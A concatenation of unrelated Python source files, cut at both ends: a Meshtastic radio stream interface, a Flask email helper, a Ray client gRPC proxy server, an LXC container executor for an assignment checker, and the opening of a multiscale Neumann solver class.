self.stream = None
def _writeBytes(self, b):
"""Write an array of bytes to our stream and flush"""
if self.stream: # ignore writes when stream is closed
self.stream.write(b)
self.stream.flush()
def _readBytes(self, len):
"""Read an array of bytes from our stream"""
return self.stream.read(len)
def _sendToRadioImpl(self, toRadio):
"""Send a ToRadio protobuf to the device"""
logging.debug(f"Sending: {stripnl(toRadio)}")
b = toRadio.SerializeToString()
bufLen = len(b)
# We convert into a string, because the TCP code doesn't work with byte arrays
header = bytes([START1, START2, (bufLen >> 8) & 0xff, bufLen & 0xff])
self._writeBytes(header + b)
def close(self):
"""Close a connection to the device"""
logging.debug("Closing stream")
MeshInterface.close(self)
# pyserial cancel_read doesn't seem to work, therefore we ask the reader thread to close things for us
self._wantExit = True
if self._rxThread != threading.current_thread():
self._rxThread.join() # wait for it to exit
def __reader(self):
"""The reader thread that reads bytes from our stream"""
empty = bytes()
try:
while not self._wantExit:
# logging.debug("reading character")
b = self._readBytes(1)
# logging.debug("In reader loop")
# logging.debug(f"read returned {b}")
if len(b) > 0:
c = b[0]
ptr = len(self._rxBuf)
# Assume we want to append this byte, fixme use bytearray instead
self._rxBuf = self._rxBuf + b
if ptr == 0: # looking for START1
if c != START1:
self._rxBuf = empty # failed to find start
if self.debugOut != None:
try:
self.debugOut.write(b.decode("utf-8"))
except:
self.debugOut.write('?')
elif ptr == 1: # looking for START2
if c != START2:
self._rxBuf = empty # failed to find start2
elif ptr >= HEADER_LEN - 1: # we've at least got a header
# big endian length follos header
packetlen = (self._rxBuf[2] << 8) + self._rxBuf[3]
if ptr == HEADER_LEN - 1: # we _just_ finished reading the header, validate length
if packetlen > MAX_TO_FROM_RADIO_SIZE:
self._rxBuf = empty # length ws out out bounds, restart
if len(self._rxBuf) != 0 and ptr + 1 >= packetlen + HEADER_LEN:
try:
self._handleFromRadio(self._rxBuf[HEADER_LEN:])
except Exception as ex:
logging.error(
f"Error while handling message from radio {ex}")
traceback.print_exc()
self._rxBuf = empty
else:
# logging.debug(f"timeout")
pass
except serial.SerialException as ex:
if not self._wantExit: # We might intentionally get an exception during shutdown
logging.warn(
f"Meshtastic serial port disconnected, disconnecting... {ex}")
except OSError as ex:
if not self._wantExit: # We might intentionally get an exception during shutdown
logging.error(
f"Unexpected OSError, terminating meshtastic reader... {ex}")
except Exception as ex:
logging.error(
f"Unexpected exception, terminating meshtastic reader... {ex}")
finally:
logging.debug("reader is exiting")
self._disconnected()
class SerialInterface(StreamInterface):
"""Interface class for meshtastic devices over a serial link"""
def __init__(self, devPath=None, debugOut=None, noProto=False, connectNow=True):
"""Constructor, opens a connection to a specified serial port, or if unspecified try to
find one Meshtastic device by probing
Keyword Arguments:
devPath {string} -- A filepath to a device, i.e. /dev/ttyUSB0 (default: {None})
debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None})
"""
if devPath is None:
ports = util.findPorts()
if len(ports) == 0:
raise Exception("No Meshtastic devices detected")
elif len(ports) > 1:
raise Exception(
f"Multiple ports detected, you must specify a device, such as {ports[0]}")
else:
devPath = ports[0]
logging.debug(f"Connecting to {devPath}")
# Note: we provide None for port here, because we will be opening it later
self.stream = serial.Serial(
None, 921600, exclusive=True, timeout=0.5, write_timeout=0)
# rts=False Needed to prevent TBEAMs resetting on OSX, because rts is connected to reset
self.stream.port = devPath
# HACK: If the platform driving the serial port is unable to leave the RTS pin in high-impedance
# mode, set RTS to false so that the device platform won't be reset spuriously.
# Linux does this properly, so don't apply this hack on Linux (because it makes the reset button not work).
if self._hostPlatformAlwaysDrivesUartRts():
self.stream.rts = False
self.stream.open()
StreamInterface.__init__(
self, debugOut=debugOut, noProto=noProto, connectNow=connectNow)
"""true if platform driving the serial port is Windows Subsystem for Linux 1."""
def _isWsl1(self):
# WSL1 identifies itself as Linux, but has a special char device at /dev/lxss for use with session control,
# e.g. /init. We should treat WSL1 as Windows for the RTS-driving hack because the underlying platfrom
# serial driver for the CP21xx still exhibits the buggy behavior.
# WSL2 is not covered here, as it does not (as of 2021-May-25) support the appropriate functionality to
# share or pass-through serial ports.
try:
# Claims to be Linux, but has /dev/lxss; must be WSL 1
return platform.system() == 'Linux' and stat.S_ISCHR(os.stat('/dev/lxss').st_mode)
except:
# Couldn't stat /dev/lxss special device; not WSL1
return False
def _hostPlatformAlwaysDrivesUartRts(self):
# OS-X/Windows seems to have a bug in its CP21xx serial drivers. It ignores that we asked for no RTSCTS
# control and will always drive RTS either high or low (rather than letting the CP102 leave
# it as an open-collector floating pin).
# TODO: When WSL2 supports USB passthrough, this will get messier. If/when WSL2 gets virtual serial
# ports that "share" the Windows serial port (and thus the Windows drivers), this code will need to be
# updated to reflect that as well -- or if T-Beams get made with an alternate USB to UART bridge that has
# a less buggy driver.
return platform.system() != 'Linux' or self._isWsl1()
class TCPInterface(StreamInterface):
"""Interface class for meshtastic devices over a TCP link"""
def __init__(self, hostname: AnyStr, debugOut=None, noProto=False, connectNow=True, portNumber=4403):
"""Constructor, opens a connection to a specified IP address/hostname
Keyword Arguments:
hostname {string} -- Hostname/IP address of the device to connect to
"""
logging.debug(f"Connecting to {hostname}")
server_address = (hostname, portNumber)
sock = socket.create_connection(server_address)
# Instead of wrapping as a stream, we use the native socket API
# self.stream = sock.makefile('rw')
self.stream = None
self.socket = sock
StreamInterface.__init__(
self, debugOut=debugOut, noProto=noProto, connectNow=connectNow)
def close(self):
"""Close a connection to the device"""
logging.debug("Closing TCP stream")
StreamInterface.close(self)
# Sometimes the socket read might be blocked in the reader thread. Therefore we force the shutdown by closing
# the socket here
self._wantExit = True
if not self.socket is None:
try:
self.socket.shutdown(socket.SHUT_RDWR)
except:
pass # Ignore errors in shutdown, because we might have a race with the server
self.socket.close()
def _writeBytes(self, b):
"""Write an array of bytes to our stream and flush"""
self.socket.send(b)
def _readBytes(self, len):
"""Read an array of bytes from our stream"""
return self.socket.recv(len)
def _onTextReceive(iface, asDict):
"""Special text auto parsing for received messages"""
# We don't throw if the utf8 is invalid in the text message. Instead we just don't populate
# the decoded.data.text and we log an error message. This at least allows some delivery to
# the app and the app can deal with the missing decoded representation.
#
# Usually btw this problem is caused by apps sending binary data but setting the payload type to
# text.
try:
asBytes = asDict["decoded"]["payload"]
asDict["decoded"]["text"] = asBytes.decode("utf-8")
except Exception as ex:
logging.error(f"Malformatted utf8 in text message: {ex}")
_receiveInfoUpdate(iface, asDict)
def _onPositionReceive(iface, asDict):
"""Special auto parsing for received messages"""
p = asDict["decoded"]["position"]
iface._fixupPosition(p)
# update node DB as needed
iface._getOrCreateByNum(asDict["from"])["position"] = p
def _onNodeInfoReceive(iface, asDict):
"""Special auto parsing for received messages"""
p = asDict["decoded"]["user"]
# decode user protobufs and update nodedb, provide decoded version as "position" in the published msg
# update node DB as needed
n = iface._getOrCreateByNum(asDict["from"])
n["user"] = p
# We now have a node ID, make sure it is uptodate in that table
iface.nodes[p["id"]] = n
_receiveInfoUpdate(iface, asDict)
def _receiveInfoUpdate(iface, asDict):
iface._getOrCreateByNum(asDict["from"])["lastReceived"] = asDict
iface._getOrCreateByNum(asDict["from"])["lastHeard"] = asDict.get("rxTime")
iface._getOrCreateByNum(asDict["from"])["snr"] = asDict.get("rxSnr")
iface._getOrCreateByNum(asDict["from"])["hopLimit"] = asDict.get("hopLimit")
"""Well known message payloads can register decoders for automatic protobuf parsing"""
protocols = {
portnums_pb2.PortNum.TEXT_MESSAGE_APP: KnownProtocol("text", onReceive=_onTextReceive),
portnums_pb2.PortNum.POSITION_APP: KnownProtocol("position", mesh_pb2.Position, _onPositionReceive),
portnums_pb2.PortNum.NODEINFO_APP: KnownProtocol("user", mesh_pb2.User, _onNodeInfoReceive),
portnums_pb2.PortNum.ADMIN_APP: KnownProtocol("admin", admin_pb2.AdminMessage),
portnums_pb2.PortNum.ROUTING_APP: KnownProtocol("routing", mesh_pb2.Routing),
portnums_pb2.PortNum.ENVIRONMENTAL_MEASUREMENT_APP: KnownProtocol("environmental", environmental_measurement_pb2.EnvironmentalMeasurement),
portnums_pb2.PortNum.REMOTE_HARDWARE_APP: KnownProtocol(
"remotehw", remote_hardware_pb2.HardwareMessage)
}
|
email.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @File : email.py
# @Author : Hython
# @Date : 公元 2020/01/14 22:51
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
proxier.py
|
import atexit
from concurrent import futures
from dataclasses import dataclass
import grpc
import logging
from itertools import chain
import json
import socket
import sys
from threading import Lock, Thread, RLock
import time
import traceback
from typing import Any, Callable, Dict, List, Optional, Tuple
import ray
from ray.cloudpickle.compat import pickle
from ray.job_config import JobConfig
from ray._raylet import connect_to_gcs
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
from ray.util.client.common import (ClientServerHandle,
CLIENT_SERVER_MAX_THREADS, GRPC_OPTIONS)
from ray._private.client_mode_hook import disable_client_hook
from ray._private.parameter import RayParams
from ray._private.runtime_env import RuntimeEnvContext
import ray._private.runtime_env.working_dir as working_dir_pkg
from ray._private.services import ProcessInfo, start_ray_client_server
from ray._private.utils import detect_fate_sharing_support
# Import psutil after ray so the packaged version is used.
import psutil
logger = logging.getLogger(__name__)
CHECK_PROCESS_INTERVAL_S = 30
MIN_SPECIFIC_SERVER_PORT = 23000
MAX_SPECIFIC_SERVER_PORT = 24000
CHECK_CHANNEL_TIMEOUT_S = 30
LOGSTREAM_RETRIES = 5
LOGSTREAM_RETRY_INTERVAL_SEC = 2
def _get_client_id_from_context(context: Any) -> str:
"""
Get `client_id` from gRPC metadata. If the `client_id` is not present,
this function logs an error and sets the status_code.
"""
metadata = {k: v for k, v in context.invocation_metadata()}
client_id = metadata.get("client_id") or ""
if client_id == "":
logger.error("Client connecting with no client_id")
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
return client_id
@dataclass
class SpecificServer:
port: int
process_handle_future: futures.Future
channel: "grpc._channel.Channel"
def is_ready(self) -> bool:
"""Check if the server is ready or not (doesn't block)."""
return self.process_handle_future.done()
def wait_ready(self, timeout: Optional[float] = None) -> None:
"""
Wait for the server to actually start up.
"""
res = self.process_handle_future.result(timeout=timeout)
if res is None:
# This is only set to none when server creation specifically fails.
raise RuntimeError("Server startup failed.")
def poll(self) -> Optional[int]:
"""Check if the process has exited."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
return proc.process.poll()
except futures.TimeoutError:
return
def kill(self) -> None:
"""Try to send a KILL signal to the process."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
proc.process.kill()
except futures.TimeoutError:
# Server has not been started yet.
pass
def set_result(self, proc: Optional[ProcessInfo]) -> None:
"""Set the result of the internal future if it is currently unset."""
if not self.is_ready():
self.process_handle_future.set_result(proc)
def _match_running_client_server(command: List[str]) -> bool:
"""
Detects if the main process in the given command is the RayClient Server.
This works by ensuring that the the first three arguments are similar to:
<python> -m ray.util.client.server
"""
flattened = " ".join(command)
rejoined = flattened.split()
if len(rejoined) < 3:
return False
return rejoined[1:3] == ["-m", "ray.util.client.server"]
class ProxyManager():
def __init__(self,
redis_address: Optional[str],
*,
session_dir: Optional[str] = None,
redis_password: Optional[str] = None):
self.servers: Dict[str, SpecificServer] = dict()
self.server_lock = RLock()
self._redis_address = redis_address
self._redis_password = redis_password
self._free_ports: List[int] = list(
range(MIN_SPECIFIC_SERVER_PORT, MAX_SPECIFIC_SERVER_PORT))
self._check_thread = Thread(target=self._check_processes, daemon=True)
self._check_thread.start()
self.fate_share = bool(detect_fate_sharing_support())
self._node: Optional[ray.node.Node] = None
atexit.register(self._cleanup)
def _get_unused_port(self) -> int:
"""
Search for a port in _free_ports that is unused.
"""
with self.server_lock:
num_ports = len(self._free_ports)
for _ in range(num_ports):
port = self._free_ports.pop(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("", port))
except OSError:
self._free_ports.append(port)
continue
finally:
s.close()
return port
raise RuntimeError("Unable to succeed in selecting a random port.")
@property
def redis_address(self) -> str:
"""
Returns the provided Ray Redis address, or creates a new cluster.
"""
if self._redis_address:
return self._redis_address
# Start a new, locally scoped cluster.
connection_tuple = ray.init()
self._redis_address = connection_tuple["redis_address"]
self._session_dir = connection_tuple["session_dir"]
return self._redis_address
@property
def node(self) -> ray.node.Node:
"""Gets a 'ray.Node' object for this node (the head node).
If it does not already exist, one is created using the redis_address.
"""
if self._node:
return self._node
ray_params = RayParams(redis_address=self.redis_address)
if self._redis_password:
ray_params.redis_password = self._redis_password
self._node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
return self._node
def create_specific_server(self, client_id: str) -> SpecificServer:
"""
Create, but not start a SpecificServer for a given client. This
method must be called once per client.
"""
with self.server_lock:
assert self.servers.get(client_id) is None, (
f"Server already created for Client: {client_id}")
port = self._get_unused_port()
server = SpecificServer(
port=port,
process_handle_future=futures.Future(),
channel=grpc.insecure_channel(
f"localhost:{port}", options=GRPC_OPTIONS))
self.servers[client_id] = server
return server
def start_specific_server(self, client_id: str,
job_config: JobConfig) -> bool:
"""
Start up a RayClient Server for an incoming client to
communicate with. Returns whether creation was successful.
"""
specific_server = self._get_server_for_client(client_id)
assert specific_server, f"Server has not been created for: {client_id}"
output, error = self.node.get_log_file_handles(
f"ray_client_server_{specific_server.port}", unique=True)
serialized_runtime_env = job_config.get_serialized_runtime_env()
runtime_env = json.loads(serialized_runtime_env)
# Set up the working_dir for the server.
# TODO(edoakes): this should go be unified with the worker setup code
# by going through the runtime_env agent.
context = RuntimeEnvContext(
env_vars=runtime_env.get("env_vars"),
resources_dir=self.node.get_runtime_env_dir_path())
working_dir_pkg.setup_working_dir(runtime_env, context)
proc = start_ray_client_server(
self.redis_address,
specific_server.port,
stdout_file=output,
stderr_file=error,
fate_share=self.fate_share,
server_type="specific-server",
serialized_runtime_env=serialized_runtime_env,
serialized_runtime_env_context=context.serialize(),
redis_password=self._redis_password)
# Wait for the process being run transitions from the shim process
# to the actual RayClient Server.
pid = proc.process.pid
if sys.platform != "win32":
psutil_proc = psutil.Process(pid)
else:
psutil_proc = None
# Don't use `psutil` on Win32
while psutil_proc is not None:
if proc.process.poll() is not None:
logger.error(
f"SpecificServer startup failed for client: {client_id}")
break
cmd = psutil_proc.cmdline()
if _match_running_client_server(cmd):
break
logger.debug(
"Waiting for Process to reach the actual client server.")
time.sleep(0.5)
specific_server.set_result(proc)
logger.info(f"SpecificServer started on port: {specific_server.port} "
f"with PID: {pid} for client: {client_id}")
return proc.process.poll() is None
def _get_server_for_client(self,
client_id: str) -> Optional[SpecificServer]:
with self.server_lock:
client = self.servers.get(client_id)
if client is None:
logger.error(f"Unable to find channel for client: {client_id}")
return client
def has_channel(self, client_id: str) -> bool:
server = self._get_server_for_client(client_id)
if server is None:
return False
return server.is_ready()
def get_channel(
self,
client_id: str,
) -> Optional["grpc._channel.Channel"]:
"""
Find the gRPC Channel for the given client_id. This will block until
the server process has started.
"""
server = self._get_server_for_client(client_id)
if server is None:
return None
# Wait for the SpecificServer to become ready.
server.wait_ready()
try:
grpc.channel_ready_future(
server.channel).result(timeout=CHECK_CHANNEL_TIMEOUT_S)
return server.channel
except grpc.FutureTimeoutError:
logger.exception(f"Timeout waiting for channel for {client_id}")
return None
def _check_processes(self):
"""
Keeps the internal servers dictionary up-to-date with running servers.
"""
while True:
with self.server_lock:
for client_id, specific_server in list(self.servers.items()):
if specific_server.poll() is not None:
del self.servers[client_id]
# Port is available to use again.
self._free_ports.append(specific_server.port)
time.sleep(CHECK_PROCESS_INTERVAL_S)
def _cleanup(self) -> None:
"""
Forcibly kill all spawned RayClient Servers. This ensures cleanup
for platforms where fate sharing is not supported.
"""
for server in self.servers.values():
server.kill()
class RayletServicerProxy(ray_client_pb2_grpc.RayletDriverServicer):
def __init__(self, ray_connect_handler: Callable,
proxy_manager: ProxyManager):
self.proxy_manager = proxy_manager
self.ray_connect_handler = ray_connect_handler
def _call_inner_function(
self, request, context,
method: str) -> Optional[ray_client_pb2_grpc.RayletDriverStub]:
client_id = _get_client_id_from_context(context)
chan = self.proxy_manager.get_channel(client_id)
if not chan:
logger.error(f"Channel for Client: {client_id} not found!")
context.set_code(grpc.StatusCode.NOT_FOUND)
return None
stub = ray_client_pb2_grpc.RayletDriverStub(chan)
try:
return getattr(stub, method)(
request, metadata=[("client_id", client_id)])
except Exception:
logger.exception(f"Proxying call to {method} failed!")
def _has_channel_for_request(self, context):
client_id = _get_client_id_from_context(context)
return self.proxy_manager.has_channel(client_id)
def Init(self, request, context=None) -> ray_client_pb2.InitResponse:
return self._call_inner_function(request, context, "Init")
def KVPut(self, request, context=None) -> ray_client_pb2.KVPutResponse:
"""Proxies internal_kv.put.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVPut")
with disable_client_hook():
already_exists = ray.experimental.internal_kv._internal_kv_put(
request.key, request.value, overwrite=request.overwrite)
return ray_client_pb2.KVPutResponse(already_exists=already_exists)
def KVGet(self, request, context=None) -> ray_client_pb2.KVGetResponse:
"""Proxies internal_kv.get.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVGet")
with disable_client_hook():
value = ray.experimental.internal_kv._internal_kv_get(request.key)
return ray_client_pb2.KVGetResponse(value=value)
def KVDel(self, request, context=None) -> ray_client_pb2.KVDelResponse:
"""Proxies internal_kv.delete.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVGet")
with disable_client_hook():
ray.experimental.internal_kv._internal_kv_del(request.key)
return ray_client_pb2.KVDelResponse()
def KVList(self, request, context=None) -> ray_client_pb2.KVListResponse:
"""Proxies internal_kv.list.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVList")
with disable_client_hook():
keys = ray.experimental.internal_kv._internal_kv_list(
request.prefix)
return ray_client_pb2.KVListResponse(keys=keys)
def KVExists(self, request,
context=None) -> ray_client_pb2.KVExistsResponse:
"""Proxies internal_kv.exists.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVExists")
with disable_client_hook():
exists = ray.experimental.internal_kv._internal_kv_exists(
request.key)
return ray_client_pb2.KVExistsResponse(exists=exists)
def ListNamedActors(self, request, context=None
) -> ray_client_pb2.ClientListNamedActorsResponse:
return self._call_inner_function(request, context, "ListNamedActors")
def ClusterInfo(self, request,
context=None) -> ray_client_pb2.ClusterInfoResponse:
# NOTE: We need to respond to the PING request here to allow the client
# to continue with connecting.
if request.type == ray_client_pb2.ClusterInfoType.PING:
resp = ray_client_pb2.ClusterInfoResponse(json=json.dumps({}))
return resp
return self._call_inner_function(request, context, "ClusterInfo")
def Terminate(self, req, context=None):
return self._call_inner_function(req, context, "Terminate")
def GetObject(self, request, context=None):
return self._call_inner_function(request, context, "GetObject")
def PutObject(self, request: ray_client_pb2.PutRequest,
context=None) -> ray_client_pb2.PutResponse:
return self._call_inner_function(request, context, "PutObject")
def WaitObject(self, request, context=None) -> ray_client_pb2.WaitResponse:
return self._call_inner_function(request, context, "WaitObject")
def Schedule(self, task, context=None) -> ray_client_pb2.ClientTaskTicket:
return self._call_inner_function(task, context, "Schedule")
def ray_client_server_env_prep(job_config: JobConfig) -> JobConfig:
return job_config
def prepare_runtime_init_req(init_request: ray_client_pb2.DataRequest
) -> Tuple[ray_client_pb2.DataRequest, JobConfig]:
"""
Extract JobConfig and possibly mutate InitRequest before it is passed to
the specific RayClient Server.
"""
init_type = init_request.WhichOneof("type")
assert init_type == "init", ("Received initial message of type "
f"{init_type}, not 'init'.")
req = init_request.init
job_config = JobConfig()
if req.job_config:
job_config = pickle.loads(req.job_config)
new_job_config = ray_client_server_env_prep(job_config)
modified_init_req = ray_client_pb2.InitRequest(
job_config=pickle.dumps(new_job_config),
ray_init_kwargs=init_request.init.ray_init_kwargs)
init_request.init.CopyFrom(modified_init_req)
return (init_request, new_job_config)
class DataServicerProxy(ray_client_pb2_grpc.RayletDataStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
self.num_clients = 0
self.clients_lock = Lock()
self.proxy_manager = proxy_manager
def modify_connection_info_resp(self,
init_resp: ray_client_pb2.DataResponse
) -> ray_client_pb2.DataResponse:
"""
Modify the `num_clients` returned the ConnectionInfoResponse because
individual SpecificServers only have **one** client.
"""
init_type = init_resp.WhichOneof("type")
if init_type != "connection_info":
return init_resp
modified_resp = ray_client_pb2.DataResponse()
modified_resp.CopyFrom(init_resp)
with self.clients_lock:
modified_resp.connection_info.num_clients = self.num_clients
return modified_resp
def Datapath(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
# Create Placeholder *before* reading the first request.
server = self.proxy_manager.create_specific_server(client_id)
try:
with self.clients_lock:
self.num_clients += 1
logger.info(f"New data connection from client {client_id}: ")
init_req = next(request_iterator)
try:
modified_init_req, job_config = prepare_runtime_init_req(
init_req)
if not self.proxy_manager.start_specific_server(
client_id, job_config):
logger.error(
f"Server startup failed for client: {client_id}, "
f"using JobConfig: {job_config}!")
raise RuntimeError(
"Starting Ray client server failed. This is most "
"likely because the runtime_env failed to be "
"installed. See ray_client_server_[port].err on the "
"head node of the cluster for the relevant logs.")
channel = self.proxy_manager.get_channel(client_id)
if channel is None:
logger.error(f"Channel not found for {client_id}")
raise RuntimeError(
"Proxy failed to Connect to backend! Check "
"`ray_client_server.err` on the cluster.")
stub = ray_client_pb2_grpc.RayletDataStreamerStub(channel)
except Exception:
init_resp = ray_client_pb2.DataResponse(
init=ray_client_pb2.InitResponse(
ok=False, msg=traceback.format_exc()))
init_resp.req_id = init_req.req_id
yield init_resp
return None
new_iter = chain([modified_init_req], request_iterator)
resp_stream = stub.Datapath(
new_iter, metadata=[("client_id", client_id)])
for resp in resp_stream:
yield self.modify_connection_info_resp(resp)
except Exception:
logger.exception("Proxying Datapath failed!")
finally:
server.set_result(None)
with self.clients_lock:
logger.debug(f"Client detached: {client_id}")
self.num_clients -= 1
class LogstreamServicerProxy(ray_client_pb2_grpc.RayletLogStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
super().__init__()
self.proxy_manager = proxy_manager
def Logstream(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
logger.debug(f"New logstream connection from client {client_id}: ")
channel = None
# We need to retry a few times because the LogClient *may* connect
# Before the DataClient has finished connecting.
for i in range(LOGSTREAM_RETRIES):
channel = self.proxy_manager.get_channel(client_id)
if channel is not None:
break
logger.warning(
f"Retrying Logstream connection. {i+1} attempts failed.")
time.sleep(LOGSTREAM_RETRY_INTERVAL_SEC)
if channel is None:
context.set_code(grpc.StatusCode.UNAVAILABLE)
return None
stub = ray_client_pb2_grpc.RayletLogStreamerStub(channel)
resp_stream = stub.Logstream(
request_iterator, metadata=[("client_id", client_id)])
try:
for resp in resp_stream:
yield resp
except Exception:
logger.exception("Proxying Logstream failed!")
def serve_proxier(connection_str: str,
redis_address: Optional[str],
*,
redis_password: Optional[str] = None,
session_dir: Optional[str] = None):
# Initialize internal KV to be used to upload and download working_dir
# before calling ray.init within the RayletServicers.
# NOTE(edoakes): redis_address and redis_password should only be None in
# tests.
if redis_address is not None and redis_password is not None:
ip, port = redis_address.split(":")
gcs_client = connect_to_gcs(ip, int(port), redis_password)
ray.experimental.internal_kv._initialize_internal_kv(gcs_client)
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=CLIENT_SERVER_MAX_THREADS),
options=GRPC_OPTIONS)
proxy_manager = ProxyManager(
redis_address, session_dir=session_dir, redis_password=redis_password)
task_servicer = RayletServicerProxy(None, proxy_manager)
data_servicer = DataServicerProxy(proxy_manager)
logs_servicer = LogstreamServicerProxy(proxy_manager)
ray_client_pb2_grpc.add_RayletDriverServicer_to_server(
task_servicer, server)
ray_client_pb2_grpc.add_RayletDataStreamerServicer_to_server(
data_servicer, server)
ray_client_pb2_grpc.add_RayletLogStreamerServicer_to_server(
logs_servicer, server)
server.add_insecure_port(connection_str)
server.start()
return ClientServerHandle(
task_servicer=task_servicer,
data_servicer=data_servicer,
logs_servicer=logs_servicer,
grpc_server=server,
)
|
lxc_executor.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import logging
from vmchecker.generic_executor import Host,VM
_logger = logging.getLogger('vm_executor')
from threading import Thread
import time
class LXCHost(Host):
def getVM(self, bundle_dir, vmcfg, assignment):
return LXCVM(self, bundle_dir, vmcfg, assignment)
class LXCVM(VM):
def __init__(self, host, bundle_dir, vmcfg, assignment):
VM.__init__(self, host, bundle_dir, vmcfg, assignment)
self.hostname = self.machinecfg.get_vmx_path()
def executeCommand(self,cmd):
return self.host.executeCommand("ssh "+self.username+"@"+self.hostname+" "+cmd)
def start(self):
self.host.executeCommand("sudo lxc-start -n "+self.hostname+" -d")
while True:
if self.hasStarted():
return
def stop(self):
self.host.executeCommand("sudo lxc-stop -n "+self.hostname)
def hasStarted(self):
time.sleep(1)
o = self.host.executeCommand("sudo lxc-info -n "+self.hostname)
print "not started"
if "-1" in o:
return False
if "refused" in self.executeCommand('echo hello'):
return False
return True
def revert(self, number = None):
'''
TODO:
1. replace hardcoded paths with configurable options
2. provide a way for starting multiple containters at the same time
'''
if number==None:
number = 1
self.host.executeCommand("sudo lxc-stop -n "+self.hostname)
self.host.executeCommand("sudo lxc-restore "+self.hostname+" "+str(number))
def copyTo(self, sourceDir, targetDir, files):
""" Copy files from host(source) to guest(target) """
for f in files:
host_path = os.path.join(sourceDir, f)
guest_path = os.path.join(targetDir, f)
#guest_path = "/var/lib/lxc/"+self.hostname+"/rootfs"+guest_path
if not os.path.exists(host_path):
_logger.error('host file (to send) "%s" does not exist' % host_path)
return
_logger.info('copy file %s from host to guest at %s' % (host_path, guest_path))
#self.host.executeCommand("sudo cp %s %s" % (host_path,guest_path))
self.host.executeCommand("scp -r "+host_path+" "+self.username+"@"+self.hostname+":"+guest_path)
def copyFrom(self, sourceDir, targetDir, files):
""" Copy files from guest(source) to host(target) """
for f in files:
host_path = os.path.join(targetDir, f)
guest_path = os.path.join(sourceDir, f)
#guest_path = "/var/lib/lxc/"+self.hostname+"/rootfs"+guest_path
_logger.info('copy file %s from guest to host at %s' % (guest_path, host_path))
#self.host.executeCommand("sudo cp %s %s" % (guest_path,host_path))
self.host.executeCommand("scp -r "+self.username+"@"+self.hostname+":"+guest_path+" "+host_path)
if not os.path.exists(host_path):
_logger.error('host file (received) "%s" does not exist' % host_path)
def run(self, shell, executable_file, timeout):
self.executeCommand("chmod +x "+ executable_file)
_logger.info('executing on the remote: prog=%s args=[%s] timeout=%d' % (shell, executable_file, timeout))
thd = Thread(target = self.executeCommand, args = (executable_file,))
thd.start()
if timeout==None:
thd.join()
else:
thd.join(timeout)
return thd.isAlive()
|
paralel_neuman_new0.py
|
import numpy as np
import scipy.sparse as sp
from ...common_files.common_infos import CommonInfos
import multiprocessing as mp
from ...solvers.solvers_scipy.solver_sp import SolverSp
from ...solvers.solvers_trilinos.solvers_tril import solverTril
import time
class masterNeumanNonNested:
def __init__(self, data_impress, elements_lv0, ml_data, n_levels, T_without, wells, pare=False):
self.data_impress = data_impress
self.elements_lv0 = elements_lv0
self.ml_data = ml_data
self.n_levels = n_levels
self.T_without = T_without
self.wells = wells
self.pare = pare
self.one_worker = True
def get_n_workers(self, list_of_subdomains):
if self.one_worker:
n_cpu = 1
else:
n_cpu = mp.cpu_count()//2 - 1
self.n_workers = n_cpu
list_of_process_per_cpu = []
n_subdomains = len(list_of_subdomains)
resto = n_subdomains % self.n_workers
n_process_per_cpu = n_subdomains//self.n_workers
if n_process_per_cpu > 0:
for i in range(self.n_workers):
list_of_process_per_cpu.append(list_of_subdomains[i*n_process_per_cpu:n_process_per_cpu*(i+1)])
if resto != 0:
for i in range(resto):
list_of_process_per_cpu[i].append(list_of_subdomains[-i])
else:
self.n_workers = resto
for i in range(resto):
list_of_process_per_cpu[i].append(list_of_subdomains[-i])
return list_of_process_per_cpu
def get_subdomains(self):
'''
ordem de envio:
volumes: global id dos volumes locais
ind_diric: indice dos volumes com pressao prescrita
ind_neum: indice dos volumes com vazao prescrita
val_diric: valores de pressao prescrita
val_neum: valores de vazao prescrita
local_transm: transmissibilidade local
all_faces: todas faces do coarse volume
intern_faces: faces internas do coarse volume
intersect_faces: faces na interseccao
'''
list_of_subdomains = []
pms_flux_faces = np.zeros(len(self.elements_lv0['faces']))
levels = self.data_impress['LEVEL']
pms = self.data_impress['pms']
